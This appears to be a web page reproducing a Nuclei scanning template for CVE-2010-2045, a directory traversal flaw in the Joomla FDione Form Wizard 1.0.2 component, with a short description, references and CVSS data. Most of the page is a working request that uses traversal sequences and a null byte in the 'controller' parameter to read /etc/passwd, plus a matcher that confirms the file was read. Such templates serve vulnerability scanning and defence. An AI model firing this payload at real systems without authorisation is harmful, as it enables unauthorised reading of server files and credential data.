CVE-2010-2045: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion

2025-08-01 Joomla Component FDione Form Wizard PoC Public

Description

A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.

PoC

id: CVE-2010-2045

info:
  name: Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12595
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2045
    - http://packetstormsecurity.org/1005-exploits/joomlafdione-lfi.txt
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58574
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2045
    cwe-id: CWE-22
    epss-score: 0.08931
    epss-percentile: 0.94967
    cpe: cpe:2.3:a:dionesoft:com_dioneformwizard:1.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dionesoft
    product: com_dioneformwizard
  tags: cve,cve2010,joomla,lfi,edb,packetstorm,dionesoft,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402203dc1f7281031dfc40c6c431c8eb95e68e752ac5532ec36978344db7143fc4c0c022015f91894d6898412ae1c625a10634bf616054a8cba2eec8d7f7e38a7705ebaca:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities